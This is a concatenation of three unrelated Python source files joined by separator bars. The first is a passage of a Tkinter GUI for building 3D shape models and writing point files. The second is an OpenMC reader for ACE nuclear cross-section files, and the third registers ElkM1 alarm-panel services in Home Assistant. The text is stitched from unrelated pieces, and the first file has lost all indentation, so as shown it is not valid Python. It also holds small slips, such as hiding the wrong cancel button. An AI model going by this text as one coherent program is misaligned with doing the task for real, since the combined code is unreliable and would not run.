def show(self, state):
if state == 1:
self.showTopFrame(1)
self.showRightFrame(1)
#self.testPrint()
elif state == 2:
self.showTopFrame(2)
self.showRightFrame(2)
elif state == 3:
self.showTopFrame(3)
self.showRightFrame(3)
def showTopFrame(self, frame):
if frame == 1:
self.showTopFrame1(1)
self.showTopFrame2(0)
self.showTopFrame3(0)
elif frame == 2:
self.showTopFrame1(0)
self.showTopFrame2(1)
self.showTopFrame3(0)
elif frame == 3:
self.showTopFrame1(0)
self.showTopFrame2(0)
self.showTopFrame3(1)
def showTopFrame1(self, flag):
if flag == 1:
self.topFrame1.grid(row=0, column=0, sticky=N + S + W + E)
self.shapeOptionMenu.pack(side=LEFT)
self.newShapeButton.pack(side=LEFT)
self.generateVideoButton.pack(side=RIGHT)
else:
self.topFrame1.grid_forget()
self.shapeOptionMenu.pack_forget()
self.newShapeButton.pack_forget()
self.generateVideoButton.pack_forget()
def showTopFrame2(self, flag):
if flag == 1:
self.topFrame2.grid(row=0, column=0, sticky=N + S + W + E)
self.cancelButton2.pack(side=LEFT)
self.doneButton2.pack(side=RIGHT)
else:
self.topFrame2.grid_forget()
self.cancelButton3.pack_forget()
self.doneButton3.pack_forget()
def showTopFrame3(self, flag):
if flag == 1:
self.topFrame3.grid(row=0, column=0, sticky=N + S + W + E)
self.cancelButton3.pack(side=LEFT)
self.doneButton3.pack(side=RIGHT)
else:
self.topFrame3.grid_forget()
self.cancelButton3.pack_forget()
self.doneButton3.pack_forget()
def showRightFrame(self, frame):
if frame == 1:
self.showRightFrame1(1)
self.showRightFrame2(0)
self.showRightFrame3(0)
elif frame == 2:
self.showRightFrame1(0)
self.showRightFrame2(1)
self.showRightFrame3(0)
else:
self.showRightFrame1(0)
self.showRightFrame2(0)
self.showRightFrame3(1)
def showRightFrame1(self, flag):
if flag == 1:
self.rightFrame1.grid(column=1, row=0, rowspan=2, sticky=N + W + E + S)
self.rightFrame1.pack_propagate(0)
self.listLabel.pack(fill=X)
self.shapesList.pack(fill=BOTH)
self.editButton.pack(fill=X)
self.deleteButton.pack(fill=X)
else:
self.rightFrame1.grid_forget()
self.listLabel.pack_forget()
self.shapesList.pack_forget()
self.editButton.pack_forget()
self.deleteButton.pack_forget()
def showRightFrame2(self, flag):
if flag == 1:
self.updateFacesList()
maxRow = 3
self.rightFrame2.grid(column=1, row=0, rowspan=2, sticky=N + W + E + S)
self.rightFrame2.grid_propagate(0)
self.pLabels[0].config(text="name")
self.pLabels[0].grid(row=0, column=0)
self.pEntries[0].grid(row=0, column=1, columnspan=2)
if isinstance(self.shapes[self.currentIndex], sp.Cylinder):
self.pLabels[1].config(text="center")
self.pLabels[2].config(text="radius")
self.pLabels[3].config(text="height")
self.pLabels[1].grid(row=1, column=0)
self.pEntries[1].grid(row=2, column=0)
self.pEntries[2].grid(row=2, column=1)
self.pEntries[3].grid(row=2, column=2)
for i in range(2, 4):
self.pLabels[i].grid(row=i + 1, column=0)
self.pEntries[i + 2].grid(row=i + 1, column=1, columnspan=2)
maxRow = 4
elif isinstance(self.shapes[self.currentIndex], sp.Cuboid) or isinstance(self.shapes[self.currentIndex],
sp.Prism):
self.pLabels[1].config(text="center")
self.pLabels[2].config(text="length")
self.pLabels[3].config(text="width")
self.pLabels[4].config(text="height")
self.pLabels[1].grid(row=1, column=0)
self.pEntries[1].grid(row=2, column=0)
self.pEntries[2].grid(row=2, column=1)
self.pEntries[3].grid(row=2, column=2)
for i in range(2, 5):
self.pLabels[i].grid(row=i + 1, column=0)
self.pEntries[i + 2].grid(row=i + 1, column=1, columnspan=2)
maxRow = 5
elif isinstance(self.shapes[self.currentIndex], sp.Frustum):
self.pLabels[1].config(text="center")
self.pLabels[2].config(text="upperLength")
self.pLabels[3].config(text="upperWidth")
self.pLabels[4].config(text="lowerLength")
self.pLabels[5].config(text="lowerWidth")
self.pLabels[6].config(text="height")
self.pLabels[1].grid(row=1, column=0)
self.pEntries[1].grid(row=2, column=0)
self.pEntries[2].grid(row=2, column=1)
self.pEntries[3].grid(row=2, column=2)
for i in range(2, 7):
self.pLabels[i].grid(row=i + 3, column=0)
self.pEntries[i + 2].grid(row=i + 3, column=1, columnspan=2)
maxRow = 7
elif isinstance(self.shapes[self.currentIndex], sp.Tree):
self.pLabels[1].config(text="center")
self.pLabels[2].config(text="height")
self.pLabels[1].grid(row=1, column=0)
self.pEntries[1].grid(row=2, column=0)
self.pEntries[2].grid(row=2, column=1)
self.pEntries[3].grid(row=2, column=2)
self.pLabels[2].grid(row=3, column=0)
self.pEntries[4 + 2].grid(row=3, column=1, columnspan=2)
maxRow = 3
self.faceListLabel.grid(row=maxRow + 2, column=0, columnspan=3)
self.facesList.grid(row=maxRow + 3, column=0, columnspan=3)
self.addFaceButton.grid(row=maxRow + 5, column=0, columnspan=3)
self.deleteFaceButton.grid(row=maxRow + 6, column=0, columnspan=3)
if self.updateRightFrame2Flag == True:
self.fecthRightFrame2Data()
else:
self.rightFrame2.grid_forget()
self.doneButton2.grid_forget()
self.cancelButton2.grid_forget()
for i in range(7):
self.pLabels[i].grid_forget()
self.pEntries[i].grid_forget()
self.faceListLabel.grid_forget()
self.facesList.grid_forget()
self.addFaceButton.grid_forget()
self.deleteFaceButton.grid_forget()
def showRightFrame3(self, flag):
if flag == 1:
self.rightFrame3.grid(column=1, row=0, rowspan=2, sticky=N)
self.rightFrame3.grid_propagate(0)
self.faceDirLabel.grid(row=0, column=0, sticky=S + N + W + E)
self.faceOptionMenu.grid(row=1, column=0, sticky=S + N + W + E)
else:
self.rightFrame3.grid_forget()
self.faceDirLabel.grid_forget()
self.faceOptionMenu.grid_forget()
#pragma mark -- button actions
#buttons in scene 1
def generateVideoButton(self):
# for i in range(len(self.shapes)):
# print " "
# print self.shapes[i].name
# for j in range(len(self.shapes[i].faces)):
# print self.shapes[i].faces[j].faceOrientation, " : ", self.shapes[i].faces[j].facePoints
mb = ModelBuilder()
Models = []
for i in self.shapes:
each_model = mb.BuildModel(i)
# Print out the 3D model's vertex and texel coordinate
# print "Print out the 3D model's vertex and texel coordinate---------------------------"
# for j in each_model:
# # j is one polygon
# print "Vertex is:"
# for k in j.Vertex:
# print k.x, k.y, k.z
# print "Texel is:"
# for n in j.Texel:
# print n.u, n.v
Models.append(each_model)
print "Models list size: ", len(Models)
img = cv2.imread("project.png",cv2.CV_LOAD_IMAGE_COLOR)
texture = Texture(img)
points = []
for i in range(0,len(Models),1):
pointsOfEachModel = []
if (i<5): # for single model building 4,11,12,13 and ground
fileIndex = i
for j in range(len(Models[i])): # j is surfaces of each model
pointsOfEachFace = texture.putTexture(Models[i][j])
pointsOfEachModel.extend(pointsOfEachFace)
elif i==5: #5-6 compound building 10
fileIndex = 5
for j in range(5, 7):
for k in range(len(Models[j])):
pointsOfEachFace = texture.putTexture(Models[j][k])
pointsOfEachModel.extend(pointsOfEachFace)
elif i==7: #7-12 compound building 9
fileIndex = 6
for j in range(7, 13):
for k in range(len(Models[j])):
pointsOfEachFace = texture.putTexture(Models[j][k])
pointsOfEachModel.extend(pointsOfEachFace)
elif (i-13)>=0 and (i-13)%2==0: #compound buildings 1-8
multiple = (i-13)/2
fileIndex = 7 + multiple
for j in range(i, i+2):
for k in range(len(Models[j])):
pointsOfEachFace = texture.putTexture(Models[j][k])
pointsOfEachModel.extend(pointsOfEachFace)
else:
continue
points = pointsOfEachModel
fileRGB = open("Models/model_"+str(fileIndex)+".dat", "w+")
for k in range(len(pointsOfEachModel)):
point = "{0},{1},{2},{r},{g},{b}\n".format(points[k].x, points[k].y,points[k].z,r=points[k].r, g=points[k].g, b=points[k].b)
fileRGB.write(point)
print "Model "+str(fileIndex)+":"+str(k)+" points generated"
print "----------UI Phase Finished----------"
print "All models have been generated, please use main.py to generate fraems of video"
def newShapeButton(self):
self.newShapeFlag = True
self.updateRightFrame2Flag = True;
self.currentIndex = len(self.shapes)
if self.shape.get() == "cylinder":
self.shapes.append(sp.Cylinder([0, 0, 0], 0, 0, ""))
elif self.shape.get() == "cuboid":
self.shapes.append(sp.Cuboid([0, 0, 0], 0, 0, 0, ""))
elif self.shape.get() == "prism":
self.shapes.append(sp.Prism([0, 0, 0], 0, 0, 0, ""))
elif self.shape.get() == "frustum":
self.shapes.append(sp.Frustum([0, 0, 0], 0, 0, 0, 0, 0, ""))
elif self.shape.get() == "tree":
self.shapes.append(sp.Tree([0, 0, 0], 0, ""))
elif self.shape.get() == "sky":
self.shapes.append(sp.Sky(""))
elif self.shape.get() == "ground":
self.shapes.append(sp.Ground(""))
self.show(2)
self.state = 2
def editButton1(self):
self.newShapeFlag = False
self.updateRightFrame2Flag = True
self.currentIndex = (self.shapesList.curselection())[0]
self.currentIndex = int(self.currentIndex)
self.show(2)
self.state = 2
def deleteButton(self):
index = int ((self.shapesList.curselection())[0])
del self.shapes[index]
self.shapesList.delete(index)
#buttons in scene 2
def addFaceButton(self):
self.updateRightFrame2Flag = False
self.show(3)
self.state = 3
def cancelButton2(self):
if self.newShapeFlag == True:
del self.shapes[self.currentIndex]
self.show(1)
self.state = 1
def doneButton2(self):
#save changes only when name is not empty
if self.pEntries[0].get() != "":
self.shapes[self.currentIndex].name = self.pEntries[0].get()
if isinstance(self.shapes[self.currentIndex], sp.Cylinder):
x = int (self.pEntries[1].get())
y = int (self.pEntries[2].get())
z = int (self.pEntries[3].get())
self.shapes[self.currentIndex].center = [x, y, z]
self.shapes[self.currentIndex].radius = int (self.pEntries[4].get())
self.shapes[self.currentIndex].height = int (self.pEntries[5].get())
elif isinstance(self.shapes[self.currentIndex], sp.Cuboid) or isinstance(self.shapes[self.currentIndex],
sp.Prism):
x = int (self.pEntries[1].get())
y = int (self.pEntries[2].get())
z = int (self.pEntries[3].get())
self.shapes[self.currentIndex].center = [x, y, z]
self.shapes[self.currentIndex].length = int (self.pEntries[4].get())
self.shapes[self.currentIndex].width = int (self.pEntries[5].get())
self.shapes[self.currentIndex].height = int (self.pEntries[6].get())
elif isinstance(self.shapes[self.currentIndex], sp.Frustum):
x = int (self.pEntries[1].get())
y = int (self.pEntries[2].get())
z = int (self.pEntries[3].get())
self.shapes[self.currentIndex].center = [x, y, z]
self.shapes[self.currentIndex].upperLength = int (self.pEntries[4].get())
self.shapes[self.currentIndex].upperWidth = int (self.pEntries[5].get())
self.shapes[self.currentIndex].lowerLength = int (self.pEntries[6].get())
self.shapes[self.currentIndex].lowerWidth = int (self.pEntries[7].get())
self.shapes[self.currentIndex].height = int (self.pEntries[8].get())
elif isinstance(self.shapes[self.currentIndex], sp.Tree):
x = int (self.pEntries[1].get())
y = int (self.pEntries[2].get())
z = int (self.pEntries[3].get())
self.shapes[self.currentIndex].center = [x, y, z]
self.shapes[self.currentIndex].height = int (self.pEntries[4].get())
if self.newShapeFlag == True:
self.shapesList.insert(END, self.shapes[self.currentIndex].name)
else:
self.shapesList.delete(self.currentIndex)
self.shapesList.insert(self.currentIndex, self.shapes[self.currentIndex].name)
self.show(1)
self.state = 1
def deleteFaceButton(self):
index = int((self.facesList.curselection())[0])
if (index < len(self.shapes[self.currentIndex].faces)):
for i in range(len(self.shapes[self.currentIndex].faces[index].lineIds)):
self.canvas.delete(self.shapes[self.currentIndex].faces[index].lineIds[i])
del self.shapes[self.currentIndex].faces[index]
self.facesList.delete(index)
#buttons in scene 3
def cancelButton3(self):
if isinstance(self.shapes[self.currentIndex], sp.Tree):
print "cancel tree face"
else:
self.canvas.delete(self.pointId)
for i in range(len(self.lineIds)):
self.canvas.delete(self.lineIds[i])
self.clear()
self.show(2)
self.state = 2
def doneButton3(self):
if isinstance(self.shapes[self.currentIndex], sp.Tree):
print "treeFace"
else:
pLen = len(self.points)
lineId = self.canvas.create_line(self.points[pLen - 1][0], self.points[pLen - 1][1], self.points[0][0],
self.points[0][1], fill="red")
self.lineIds.append(lineId)
face = sp.Face(self.points, self.faceDir.get())
face.lineIds = self.lineIds
self.shapes[self.currentIndex].faces.append(face)
self.clear()
self.show(2)
self.state = 2
#pragma mark -- canvas draw
def drawPoint(self, p):
return self.canvas.create_oval(p[0], p[1], p[0], p[1], fill="red", outline="red")
def canvasClicked(self, event):
if self.state == 3:
x = self.canvas.canvasx(event.x)
y = self.canvas.canvasy(event.y)
lineId = ""
self.points.append([x, y])
pLen = len(self.points)
if (pLen == 1):
self.pointId = self.drawPoint([x, y])
elif (pLen == 2):
self.canvas.delete(self.pointId)
lineId = self.canvas.create_line(self.points[pLen - 2][0], self.points[pLen - 2][1], x, y, fill="red")
self.lineIds.append(lineId)
else:
lineId = self.canvas.create_line(self.points[pLen - 2][0], self.points[pLen - 2][1], x, y, fill="red")
self.lineIds.append(lineId)
# Script entry point: build the root window and hand control to Tk's loop.
root = Tk()
root.resizable(width=FALSE, height=FALSE)  # fixed-size window
app = App(root)
root.mainloop()
| |
"""This module is for reading ACE-format cross sections. ACE stands for "A
Compact ENDF" format and originated from work on MCNP_. It is used in a number
of other Monte Carlo particle transport codes.
ACE-format cross sections are typically generated from ENDF_ files through a
cross section processing program like NJOY_. The ENDF data consists of tabulated
thermal data, ENDF/B resonance parameters, distribution parameters in the
unresolved resonance region, and tabulated data in the fast region. After the
ENDF data has been reconstructed and Doppler-broadened, the ACER module
generates ACE-format cross sections.
.. _MCNP: https://laws.lanl.gov/vhosts/mcnp.lanl.gov/
.. _NJOY: http://t2.lanl.gov/codes.shtml
.. _ENDF: http://www.nndc.bnl.gov/endf
"""
from pathlib import PurePath
import struct
import sys
import numpy as np
from openmc.mixin import EqualityMixin
import openmc.checkvalue as cv
from .data import ATOMIC_SYMBOL, gnd_name
from .endf import ENDF_FLOAT_RE
def get_metadata(zaid, metastable_scheme='nndc'):
    """Return basic identifying data for a nuclide with a given ZAID.

    Parameters
    ----------
    zaid : int
        ZAID (1000*Z + A) obtained from a library
    metastable_scheme : {'nndc', 'mcnp'}
        Determine how ZAID identifiers are to be interpreted in the case of
        a metastable nuclide. Because the normal ZAID (=1000*Z + A) does not
        encode metastable information, different conventions are used among
        different libraries. In MCNP libraries, the convention is to add 400
        for a metastable nuclide except for Am242m, for which 95242 is
        metastable and 95642 (or 1095242 in newer libraries) is the ground
        state. For NNDC libraries, ZAID is given as 1000*Z + A + 100*m.

    Returns
    -------
    name : str
        Name of the table
    element : str
        The atomic symbol of the isotope in the table; e.g., Zr.
    Z : int
        Number of protons in the nucleus
    mass_number : int
        Number of nucleons in the nucleus
    metastable : int
        Metastable state of the nucleus. A value of zero indicates ground
        state.
    """
    cv.check_type('zaid', zaid, int)
    cv.check_value('metastable_scheme', metastable_scheme, ['nndc', 'mcnp'])

    Z, mass_number = divmod(zaid, 1000)

    if metastable_scheme == 'nndc':
        metastable = 1 if mass_number > 300 else 0
    else:  # 'mcnp'
        if zaid > 1000000:
            # New SZA format (SSSZZZAAA): strip the metastable prefix off Z
            Z %= 1000
            metastable = 0 if zaid == 1095242 else zaid // 1000000
        elif zaid == 95242:
            metastable = 1  # Am242m special case
        elif zaid == 95642:
            metastable = 0  # Am242 ground-state special case
        else:
            metastable = 1 if mass_number > 300 else 0

    # Remove the +100*m (or +400) offsets encoded in the mass number
    while mass_number > 3 * Z:
        mass_number -= 100

    element = ATOMIC_SYMBOL[Z]
    name = gnd_name(Z, mass_number, metastable)
    return (name, element, Z, mass_number, metastable)
def ascii_to_binary(ascii_file, binary_file):
    """Convert an ACE file in ASCII format (type 1) to binary format (type 2).

    Parameters
    ----------
    ascii_file : str
        Filename of ASCII ACE file
    binary_file : str
        Filename of binary ACE file to be written

    Raises
    ------
    NotImplementedError
        If a version >2.0.0 header is found that is not backwards compatible.
    """
    # Set default record length (Fortran record size of the type-2 format)
    record_length = 4096

    # Read data from ASCII file; `with` guarantees the handle is closed
    # even if reading fails (the previous explicit open/close leaked on
    # exceptions)
    with open(str(ascii_file), 'r') as ascii_handle:
        lines = ascii_handle.readlines()

    # Open binary file
    with open(str(binary_file), 'wb') as binary:
        idx = 0
        while idx < len(lines):
            # check if it's a > 2.0.0 version header (first token looks like
            # a version number, e.g. "2.0.1")
            if lines[idx].split()[0][1] == '.':
                if lines[idx + 1].split()[3] == '3':
                    # skip the extra 3-line header down to the legacy header
                    idx = idx + 3
                else:
                    # BUG FIX: adjacent string literals were missing a space
                    # ("...ACEheaders...")
                    raise NotImplementedError('Only backwards compatible ACE '
                                              'headers currently supported')
            # Read/write header block (fixed-width fields)
            hz = lines[idx][:10].encode('UTF-8')
            aw0 = float(lines[idx][10:22])
            tz = float(lines[idx][22:34])
            hd = lines[idx][35:45].encode('UTF-8')
            hk = lines[idx + 1][:70].encode('UTF-8')
            hm = lines[idx + 1][70:80].encode('UTF-8')
            binary.write(struct.pack(str('=10sdd10s70s10s'), hz, aw0, tz, hd, hk, hm))
            # Read/write the 16 IZ/AW pairs, interleaved as int,double,...
            data = ' '.join(lines[idx + 2:idx + 6]).split()
            iz = list(map(int, data[::2]))
            aw = list(map(float, data[1::2]))
            izaw = [item for sublist in zip(iz, aw) for item in sublist]
            binary.write(struct.pack(str('=' + 16*'id'), *izaw))
            # Read/write NXS and JXS arrays. Null bytes are added at the end
            # so that XSS will start at the second record
            nxs = list(map(int, ' '.join(lines[idx + 6:idx + 8]).split()))
            jxs = list(map(int, ' '.join(lines[idx + 8:idx + 12]).split()))
            binary.write(struct.pack(str('=16i32i{0}x'.format(record_length - 500)),
                                     *(nxs + jxs)))
            # Read/write XSS array (nxs[0] doubles, 4 per ASCII line). Null
            # bytes are added to form a complete record at the end
            n_lines = (nxs[0] + 3)//4
            xss = list(map(float, ' '.join(lines[
                idx + 12:idx + 12 + n_lines]).split()))
            extra_bytes = record_length - ((len(xss)*8 - 1) % record_length + 1)
            binary.write(struct.pack(str('={0}d{1}x'.format(nxs[0], extra_bytes)),
                                     *xss))
            # Advance to next table in file
            idx += 12 + n_lines
def get_table(filename, name=None):
    """Read a single table from an ACE file.

    Parameters
    ----------
    filename : str
        Path of the ACE library to load table from
    name : str, optional
        Name of table to load, e.g. '92235.71c'

    Returns
    -------
    openmc.data.ace.Table
        ACE table with specified name. If no name is specified, the first
        table in the file is returned.

    Raises
    ------
    ValueError
        If `name` was given but no matching table exists in the file.
    """
    if name is None:
        # no filter: parse everything and hand back the first table
        return Library(filename).tables[0]
    lib = Library(filename, name)
    if not lib.tables:
        raise ValueError('Could not find ACE table with name: {}'
                         .format(name))
    return lib.tables[0]
class Library(EqualityMixin):
    """A Library object represents an ACE-formatted file which may contain
    multiple tables with data.

    Parameters
    ----------
    filename : str
        Path of the ACE library file to load.
    table_names : None, str, or iterable, optional
        Tables from the file to read in. If None, reads in all of the
        tables. If str, reads in only the single table of a matching name.
    verbose : bool, optional
        Determines whether output is printed to the stdout when reading a
        Library

    Attributes
    ----------
    tables : list
        List of :class:`Table` instances
    """
    def __init__(self, filename, table_names=None, verbose=False):
        # Normalize table_names to a set, or None meaning "read everything"
        if isinstance(table_names, str):
            table_names = [table_names]
        if table_names is not None:
            table_names = set(table_names)
        self.tables = []
        # Determine whether file is ASCII or binary
        filename = str(filename)
        try:
            fh = open(filename, 'rb')
            # Grab 10 lines of the library
            sb = b''.join([fh.readline() for i in range(10)])
            # Try to decode it with ascii
            sb.decode('ascii')
            # No exception so proceed with ASCII - reopen in non-binary
            fh.close()
            with open(filename, 'r') as fh:
                self._read_ascii(fh, table_names, verbose)
        except UnicodeDecodeError:
            # Binary content raised during decode; reopen and parse as type 2
            fh.close()
            with open(filename, 'rb') as fh:
                self._read_binary(fh, table_names, verbose)
    def _read_binary(self, ace_file, table_names, verbose=False,
                     recl_length=4096, entries=512):
        """Read a binary (Type 2) ACE table.

        Parameters
        ----------
        ace_file : file
            Open ACE file
        table_names : None, str, or iterable
            Tables from the file to read in. If None, reads in all of the
            tables. If str, reads in only the single table of a matching name.
        verbose : str, optional
            Whether to display what tables are being read. Defaults to False.
        recl_length : int, optional
            Fortran record length in binary file. Default value is 4096 bytes.
        entries : int, optional
            Number of entries per record. The default is 512 corresponding to
            a record length of 4096 bytes with double precision data.
        """
        while True:
            start_position = ace_file.tell()
            # Check for end-of-file
            if len(ace_file.read(1)) == 0:
                return
            ace_file.seek(start_position)
            # Read name, atomic mass ratio, temperature, date, comment, and
            # material
            name, atomic_weight_ratio, temperature, date, comment, mat = \
                struct.unpack(str('=10sdd10s70s10s'), ace_file.read(116))
            name = name.decode().strip()
            # Read ZAID/awr combinations (16 int/double pairs)
            data = struct.unpack(str('=' + 16*'id'), ace_file.read(192))
            pairs = list(zip(data[::2], data[1::2]))
            # Read NXS
            nxs = list(struct.unpack(str('=16i'), ace_file.read(64)))
            # Determine length of XSS and number of records
            length = nxs[0]
            n_records = (length + entries - 1)//entries
            # verify that we are supposed to read this table in
            if (table_names is not None) and (name not in table_names):
                # skip the remainder of this table's records
                ace_file.seek(start_position + recl_length*(n_records + 1))
                continue
            if verbose:
                kelvin = round(temperature * 1e6 / 8.617342e-5)
                print("Loading nuclide {0} at {1} K".format(name, kelvin))
            # Read JXS
            jxs = list(struct.unpack(str('=32i'), ace_file.read(128)))
            # Read XSS (starts at the second record of the table)
            ace_file.seek(start_position + recl_length)
            xss = list(struct.unpack(str('={0}d'.format(length)),
                                     ace_file.read(length*8)))
            # Insert zeros at beginning of NXS, JXS, and XSS arrays so that
            # the indexing will be the same as Fortran. This makes it easier
            # to follow the ACE format specification.
            nxs.insert(0, 0)
            nxs = np.array(nxs, dtype=int)
            jxs.insert(0, 0)
            jxs = np.array(jxs, dtype=int)
            xss.insert(0, 0.0)
            xss = np.array(xss)
            # Create ACE table with data read in
            table = Table(name, atomic_weight_ratio, temperature, pairs,
                          nxs, jxs, xss)
            self.tables.append(table)
            # Advance to next record
            ace_file.seek(start_position + recl_length*(n_records + 1))
    def _read_ascii(self, ace_file, table_names, verbose=False):
        """Read an ASCII (Type 1) ACE table.

        Parameters
        ----------
        ace_file : file
            Open ACE file
        table_names : None, str, or iterable
            Tables from the file to read in. If None, reads in all of the
            tables. If str, reads in only the single table of a matching name.
        verbose : str, optional
            Whether to display what tables are being read. Defaults to False.
        """
        tables_seen = set()
        # 13 lines cover the header blocks plus the first line of XSS data
        lines = [ace_file.readline() for i in range(13)]
        while len(lines) != 0 and lines[0].strip() != '':
            # Read name of table, atomic mass ratio, and temperature. If
            # first line is empty, we are at end of file
            # check if it's a 2.0 style header (first token is a version
            # number like "2.0.1")
            if lines[0].split()[0][1] == '.':
                words = lines[0].split()
                name = words[1]
                words = lines[1].split()
                atomic_weight_ratio = float(words[0])
                temperature = float(words[1])
                commentlines = int(words[3])
                # drop the comment lines, refilling the 13-line window
                for i in range(commentlines):
                    lines.pop(0)
                    lines.append(ace_file.readline())
            else:
                words = lines[0].split()
                name = words[0]
                atomic_weight_ratio = float(words[1])
                temperature = float(words[2])
            datastr = ' '.join(lines[2:6]).split()
            pairs = list(zip(map(int, datastr[::2]),
                             map(float, datastr[1::2])))
            # Leading '0 ' pads the array for Fortran-style 1-based indexing
            # NOTE(review): np.fromstring text parsing (sep=' ') is
            # deprecated in newer NumPy -- consider
            # np.array(datastr.split(), dtype=int) when modernizing
            datastr = '0 ' + ' '.join(lines[6:8])
            nxs = np.fromstring(datastr, sep=' ', dtype=int)
            # nxs[1] is the XSS length; data is written 4 values per line
            n_lines = (nxs[1] + 3)//4
            # Ensure that we have more tables to read in
            if (table_names is not None) and (table_names <= tables_seen):
                break
            tables_seen.add(name)
            # verify that we are supposed to read this table in
            if (table_names is not None) and (name not in table_names):
                for i in range(n_lines - 1):
                    ace_file.readline()
                lines = [ace_file.readline() for i in range(13)]
                continue
            # Read lines corresponding to this table
            lines += [ace_file.readline() for i in range(n_lines - 1)]
            if verbose:
                kelvin = round(temperature * 1e6 / 8.617342e-5)
                print("Loading nuclide {0} at {1} K".format(name, kelvin))
            # Insert zeros at beginning of NXS, JXS, and XSS arrays so that
            # the indexing will be the same as Fortran. This makes it easier
            # to follow the ACE format specification.
            datastr = '0 ' + ' '.join(lines[8:12])
            jxs = np.fromstring(datastr, dtype=int, sep=' ')
            datastr = '0.0 ' + ''.join(lines[12:12+n_lines])
            xss = np.fromstring(datastr, sep=' ')
            # When NJOY writes an ACE file, any values less than 1e-100
            # actually get written without the 'e'. Thus, what we do here is
            # check whether the xss array is of the right size (if a number
            # like 1.0-120 is encountered, np.fromstring won't capture any
            # numbers after it). If it's too short, then we apply the ENDF
            # float regular expression. We don't do this by default because
            # it's expensive!
            if xss.size != nxs[1] + 1:
                datastr = ENDF_FLOAT_RE.sub(r'\1e\2', datastr)
                xss = np.fromstring(datastr, sep=' ')
                assert xss.size == nxs[1] + 1
            table = Table(name, atomic_weight_ratio, temperature, pairs,
                          nxs, jxs, xss)
            self.tables.append(table)
            # Read all data blocks of the next table
            lines = [ace_file.readline() for i in range(13)]
    
class Table(EqualityMixin):
    """A single cross section table parsed from an ACE-format file.

    Instances are plain value holders: every constructor argument is stored
    unmodified as an attribute of the same name.

    Parameters
    ----------
    name : str
        ZAID identifier of the table, e.g. '92235.70c'.
    atomic_weight_ratio : float
        Atomic mass ratio of the target nuclide.
    temperature : float
        Temperature of the target nuclide in MeV.
    pairs : list of tuple
        16 pairs of ZAIDs and atomic weight ratios. Used for thermal scattering
        tables to indicate what isotopes scattering is applied to.
    nxs : numpy.ndarray
        Array that defines various lengths within the table.
    jxs : numpy.ndarray
        Array that gives locations in the ``xss`` array for various blocks of
        data.
    xss : numpy.ndarray
        Raw data for the ACE table.
    """

    def __init__(self, name, atomic_weight_ratio, temperature, pairs,
                 nxs, jxs, xss):
        # Keep the header metadata and raw data arrays exactly as parsed;
        # interpretation of nxs/jxs/xss is left to consumers of the table.
        self.name = name
        self.atomic_weight_ratio = atomic_weight_ratio
        self.temperature = temperature
        self.pairs = pairs
        self.nxs = nxs
        self.jxs = jxs
        self.xss = xss

    def __repr__(self):
        # Identify the table by its ZAID, e.g. "<ACE Table: 92235.70c>".
        return "<ACE Table: %s>" % self.name
| |
"""Each ElkM1 area will be created as a separate alarm_control_panel."""
from elkm1_lib.const import AlarmState, ArmedStatus, ArmLevel, ArmUpState
from elkm1_lib.util import username
import voluptuous as vol
from homeassistant.components.alarm_control_panel import (
ATTR_CHANGED_BY,
FORMAT_NUMBER,
AlarmControlPanelEntity,
)
from homeassistant.components.alarm_control_panel.const import (
SUPPORT_ALARM_ARM_AWAY,
SUPPORT_ALARM_ARM_HOME,
SUPPORT_ALARM_ARM_NIGHT,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
STATE_ALARM_ARMED_AWAY,
STATE_ALARM_ARMED_HOME,
STATE_ALARM_ARMED_NIGHT,
STATE_ALARM_ARMING,
STATE_ALARM_DISARMED,
STATE_ALARM_PENDING,
STATE_ALARM_TRIGGERED,
)
from homeassistant.helpers import entity_platform
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.restore_state import RestoreEntity
from . import ElkAttachedEntity, create_elk_entities
from .const import (
ATTR_CHANGED_BY_ID,
ATTR_CHANGED_BY_KEYPAD,
ATTR_CHANGED_BY_TIME,
DOMAIN,
ELK_USER_CODE_SERVICE_SCHEMA,
)
# Schema for the alarm_display_message service: target entities plus the
# parameters forwarded to Area.display_message (see ElkArea.async_display_message).
DISPLAY_MESSAGE_SERVICE_SCHEMA = vol.Schema(
    {
        vol.Optional(ATTR_ENTITY_ID, default=[]): cv.entity_ids,
        # Restricted to 0, 1 or 2 — presumably the Elk display-clear modes;
        # confirm exact semantics against elkm1_lib's display_message.
        vol.Optional("clear", default=2): vol.All(vol.Coerce(int), vol.In([0, 1, 2])),
        vol.Optional("beep", default=False): cv.boolean,
        # Bounded to a 16-bit value; 0 is the default (no timeout, per the
        # usual Elk convention — TODO confirm units against elkm1_lib).
        vol.Optional("timeout", default=0): vol.All(
            vol.Coerce(int), vol.Range(min=0, max=65535)
        ),
        # Two display lines; empty strings leave the line blank.
        vol.Optional("line1", default=""): cv.string,
        vol.Optional("line2", default=""): cv.string,
    }
)

# Names of the ElkM1-specific entity services registered in async_setup_entry.
SERVICE_ALARM_DISPLAY_MESSAGE = "alarm_display_message"
SERVICE_ALARM_ARM_VACATION = "alarm_arm_vacation"
SERVICE_ALARM_ARM_HOME_INSTANT = "alarm_arm_home_instant"
SERVICE_ALARM_ARM_NIGHT_INSTANT = "alarm_arm_night_instant"
SERVICE_ALARM_BYPASS = "alarm_bypass"
SERVICE_ALARM_CLEAR_BYPASS = "alarm_clear_bypass"
async def async_setup_entry(hass, config_entry, async_add_entities):
    """Set up the ElkM1 alarm platform."""
    elk_data = hass.data[DOMAIN][config_entry.entry_id]

    # One alarm_control_panel entity per ElkM1 area.
    panels = []
    create_elk_entities(elk_data, elk_data["elk"].areas, "area", ElkArea, panels)
    async_add_entities(panels, True)

    # Register the ElkM1-specific entity services on this platform.  Each
    # entry maps a service name to its schema and the ElkArea coroutine
    # that handles it; registration order matches the historical one.
    platform = entity_platform.current_platform.get()
    custom_services = (
        (SERVICE_ALARM_ARM_VACATION,
         ELK_USER_CODE_SERVICE_SCHEMA, "async_alarm_arm_vacation"),
        (SERVICE_ALARM_ARM_HOME_INSTANT,
         ELK_USER_CODE_SERVICE_SCHEMA, "async_alarm_arm_home_instant"),
        (SERVICE_ALARM_ARM_NIGHT_INSTANT,
         ELK_USER_CODE_SERVICE_SCHEMA, "async_alarm_arm_night_instant"),
        (SERVICE_ALARM_DISPLAY_MESSAGE,
         DISPLAY_MESSAGE_SERVICE_SCHEMA, "async_display_message"),
        (SERVICE_ALARM_BYPASS,
         ELK_USER_CODE_SERVICE_SCHEMA, "async_bypass"),
        (SERVICE_ALARM_CLEAR_BYPASS,
         ELK_USER_CODE_SERVICE_SCHEMA, "async_clear_bypass"),
    )
    for service_name, schema, handler in custom_services:
        platform.async_register_entity_service(service_name, schema, handler)
